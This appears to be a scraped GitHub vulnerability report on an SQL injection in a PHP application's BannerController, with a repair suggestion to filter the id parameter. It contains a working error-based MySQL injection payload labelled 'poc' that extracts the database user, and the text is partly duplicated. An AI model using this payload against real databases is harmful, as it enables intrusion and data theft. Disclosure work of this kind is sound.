You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Use burpsuite to intercept requests, modify packets, and add payloads
Vulnerability analysis
poc:
5) AND (SELECT 5824 FROM(SELECT COUNT(*),CONCAT('[+]',(MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,54)),'[+]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (3481=3481
source:
debugging process:
Repair suggestion
before executing the save() function, filter the id
The text was updated successfully, but these errors were encountered:
\App\Manage\Controller\BannerController.class.php
Find where the file was uploaded
Use burpsuite to intercept requests, modify packets, and add payloads
Vulnerability analysis
poc:
5) AND (SELECT 5824 FROM(SELECT COUNT(*),CONCAT('[+]',(MID((IFNULL(CAST(user() AS NCHAR),0x20)),1,54)),'[+]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (3481=3481
source:
debugging process:
Repair suggestion
before executing the save() function, filter the id
The text was updated successfully, but these errors were encountered: